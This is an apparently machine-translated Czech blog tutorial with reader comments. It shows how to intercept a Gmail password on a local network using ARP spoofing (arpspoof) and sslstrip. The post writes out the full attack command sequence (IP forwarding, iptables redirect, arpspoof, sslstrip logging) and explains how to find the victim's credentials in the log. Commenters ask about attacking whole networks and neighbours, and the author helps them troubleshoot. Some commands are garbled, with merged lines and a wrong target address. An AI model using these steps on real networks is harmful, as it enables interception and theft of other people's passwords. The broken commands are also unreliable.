ArpSpoofing a SSlstrip v akci.

Ahoj bloggeri.

Pro dnešek mám malý vzorek toho, jak nebezpečné může být připojení k jakékoli síti bez zabezpečení těch, které se nám tolik líbí.

Pro dnešek použiji ArpSpoofing s Sslstrip k získání hesla pro Gmail. Pro lepší kontrolu prostředí jsem vytvořil účet s názvem „testarp@gmail.com".

A protože se mi preambule moc nelíbí, pusťme se do toho.

Nejsem kdykoli odpovědný za to, co mohou udělat s následujícími informacemi. Dělám to výhradně pro vzdělávací účely

ŽIVOTNÍ PROSTŘEDÍ

Pro tento test máme následující:

1. Útočník: Je to můj stolní nebo stolní počítač, který má Debian Wheezy. Z úložišť můžete nainstalovat sslstrip y dsniff mít harpspoofing

2. Oběť: Obětí je tablet Android, který chce vidět svou poštu pouze prostřednictvím prohlížeče.

3. Médium: Prostřední je moje Směrovač Cisco DPC2425

ADRESY.

Adresa útočníka: 172.26.0.2

Adresa routeru: 172.26.0.1

Adresa oběti: 172.26.0.8

ÚTOK:

Chcete-li trochu více pochopit, jak útok funguje, můžete přejít na můj starý POST

První věcí, kterou pro tento útok uděláme, je aktivace předávání, aby náš počítač mohl předávat informace oběti, aniž by si toho všimla. (Jinak by to byl útok odmítnutí služeb)

K tomu použijeme:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Každý příkaz v okně přímé konzoly.

Nyní, když uděláme tail -f desdelinux vidíme informace živě a přímo

snímek1

Tak jak tedy dosáhneme toho, co chceme?

Nejprve zadejte svoji poštu na tabletu. Při přihlášení vidíme, že se na naší konzoli objevují tisíce a tisíce věcí.

Nyní, když je hotovo, otevřeme náš soubor “desdelinux“s nano

nano desdelinux

pomocí Control + W hledáme něco, čemu se říká SECURE POST.

A uvidíme něco takového.

snímek2

Mezi touto obrovskou linií, kterou nelze vidět, je e-mail a heslo oběti.

Běháme tedy doprava, dokud konečně neuvidíme světlo na konci tunelu.

snímek3

Při jiné příležitosti uvidíme, jak se můžeme před těmito útoky trochu chránit.

pozdravy


Zanechte svůj komentář

Vaše e-mailová adresa nebude zveřejněna. Povinné položky jsou označeny *

*

*

  1. Odpovědný za údaje: Miguel Ángel Gatón
  2. Účel údajů: Ovládací SPAM, správa komentářů.
  3. Legitimace: Váš souhlas
  4. Sdělování údajů: Údaje nebudou sděleny třetím osobám, s výjimkou zákonných povinností.
  5. Úložiště dat: Databáze hostovaná společností Occentus Networks (EU)
  6. Práva: Vaše údaje můžete kdykoli omezit, obnovit a odstranit.

  1.   @Jlcmux řekl

    Využívám této příležitosti a říkám, že když byl příspěvek zveřejněn, příkazy nebyly správné.

    Příkaz iptables na konci chybí 8080, který je na jiném řádku. A pak byly všechny příkazy arpspoof na stejném řádku. Každý příkaz je na jiném řádku.

    Doufejme, že to editor uvidí a dokáže to opravit.

    Zdravím.

    1.    Manuál Zdroje řekl

      Provedl jsem opravy, které zmiňuješ, je to v pořádku?

      Pokud se chystáte vložit kód do preferované položky, použijte zobrazení HTML a před odesláním do čekání ověřte správnost článku. Děkuji.

  2.   Luis řekl

    Je mrazivé vědět, že ti z nás, kteří nemají znalosti, jsou tak zranitelní. Velmi dobrá informace, i když málo rozumím tématu, uvědomuji si důležitost. Děkuji!
    pozdravy

  3.   giskard řekl

    Funguje to však pouze v případě, že útočník a oběť jsou ve stejné síti. V každém případě se mi zdá, že pokud se (ve stejné síti) připojíte pomocí HTTPS, nedojde k tomu, protože data jsou šifrována PŘED opuštěním vašeho počítače. Pokud se připojujete pomocí protokolu HTTP (bez S), myslím, že i při pohledu na síťový kabel vidíte klíče.

    1.    @Jlcmux řekl

      To není pravda. Hackuji heslo do Gmailu a pokud si všimnete, že Gmail používá https. Tak? Jde o to, že i když je https zabezpečený, záleží na http. Takže to není tak bezpečné.

      Nepřiznávejte tolik o https, že S není pro Supermana, ale pro „bezpečné“

    2.    Rten řekl

      funguje s https nebo bez https, zkusil jsem to s více specializovaným linuxovým distro a funguje to bez problémů

    3.    Manuál Zdroje řekl

      Můžete jej přesně použít k tomu, abyste naučili lekci těm, kteří vám ukradnou Wi-Fi. 😀

      Je to víceméně jako to, co už dávno řekli na blogu Chemy Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Kypřící látka řekl

        Ostia, skvělé, co to dělá! / A potom řeknou mému paranoidovi pokaždé, když použiji VPN, když si jdou zkontrolovat bankovní účet ...). Mimochodem, musíte vidět, jak jsou cyničtí lidé v komentářích ... pokud nakonec krade ...

        1.    eliotime3000 řekl

          Nyní musíme absolvovat výukový program, jak vytvořit a nabídnout vlastní službu VPN.

      2.    Daniel řekl

        Příběh, který propojíte, je velmi zajímavý, dokonce se zdá hodný nové knihy, a díky tomu si pamatuji, když jsem použil internet mých sousedů, a přestože říkám, že předmět znám, myslím, že jsem nikdy neviděl skutečné rozměry nebezpečí, které jsem mohl mít naposledy, naštěstí pro mě, změnili pouze heslo na WPA2 a tam začal můj příběh s ISP haha

    4.    Mauritius řekl

      Proto název říká Sslstrip v akci.

      Funguje to, pokud je útočník uprostřed

  4.   ihned řekl

    Na jaké vlně pracujete na hranolu? -.-
    no.
    Na co čekáte, než pošlete svůj požadavek XD
    jde o
    dobrý příspěvek

  5.   auroszx řekl

    Zajímavé, později udělám vzdělávací test ... Možná bych mohl dokonce odstranit heslo k WiFi a trochu se pobavit 😛
    Můžete náhodou udělat něco podobného, ​​abyste poslali různé stránky na ty, které si cíl přál? Například chtějí otevřít Facebook a já je přesměruji na Google? 😛

    1.    @Jlcmux řekl

      Ano. Ale je to všechno velmi odlišná role.

      Možná to zveřejním později.

  6.   poslední nováček řekl

    velmi dobrý příspěvek, tato témata jsou velmi poučná, nyní musíme být schopni čelit tomuto útoku, protože někteří (jako já) se připojují k veřejným sítím (například univerzita), bylo by užitečné se mu vyhnout.

    Zdravím!

  7.   jen-další-dl-uživatel řekl

    Pro mě to nefungovalo 🙁

  8.   Páni řekl

    Něco mi zde selhává, kromě skutečnosti, že připojení https jsou šifrována pomocí certifikátu serveru (jakmile máte certifikát na svém počítači, šifrování má na starosti váš prohlížeč) s iptables přesměrováváte port 80 (http), ne 443 což je https

    1.    @Jlcmux řekl

      Také jsem si to myslel. Jde o to, že ačkoli je https „zabezpečený“, bohužel záleží na http. Takže sslstrip to využívá, dělá prohlížeč přesvědčen, že používá pověření https, ale není.

      1.    Páni řekl

        do prdele! ale prohlížeč by měl vidět varování jako „tento certifikát pochází z podezřelého webu nebo něco podobného“ ... určitě budu muset udělat testy XD

        1.    @Jlcmux řekl

          Ne, absolutně nic nevychází.

  9.   jen-další-dl-uživatel řekl

    Nakonec to fungovalo pro mě
    Jsem připojený k síti WEP s heslem a stejně mi to ukázalo heslo.

    Dotaz. Můžete udělat stejný postup, ale pro všechny počítače připojené k síti, místo abyste měli jedinou oběť?

    1.    @Jlcmux řekl

      Ano můžeš. Ale neprovedl jsem experimenty. Zkuste to sami a řekněte nám, jak to chodí.

  10.   19. díl Sinnick řekl

    Jediná věc, kterou s tím dostanu, je, že stroj oběti přejde do režimu offline, ale sslstrip mi nic neukáže: /

    1.    @Jlcmux řekl

      Měli byste na chvíli deaktivovat bránu firewall. Nebo alespoň povolte příchozí připojení.

  11.   Pane Blacku řekl

    Sonda a já jsme viděli pouze uživatelské jméno a heslo stránky na facebooku, v gmailu jsem v logu nenašel žádný výsledek, také mi stačil řádek arpspoof «arpspoof -i -t«. Na druhou stranu stroj oběti nemohl otevřít některé stránky. Budu pokračovat ve vyšetřování, je to velmi zajímavé. Pomoc pro ty, kteří používají Manjaro, balíčky k instalaci jsou: dsniff (zde je arpspoff), twisted a python2-pyopenssl. Sslstrip lze stáhnout zde: http://www.thoughtcrime.org/software/sslstrip/
    Chcete-li jej spustit $ python2 sslstrip.py
    Zdravím.

  12.   Pane Blacku řekl

    Nevyšlo, ale řádek arpspoof je: #arpspoof -i int -t ip-oběť ip-router

  13.   Gilbert řekl

    podívej, dělám přesně to, co říkáš:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Problém je v tom, že oběť, což je další počítač, který mám tady ve svém pokoji, je ponechán bez připojení k bodu, kdy musím restartovat router, co mám dělat, pomoci mi.

    Další věc, pracuji s virtuálním strojem, a když spustím příkaz iwconfig, wlan0 se neobjeví, ani když spustím ifconfig, ale pokud mám na svém virtuálním stroji internet, co s rozhraním eth0.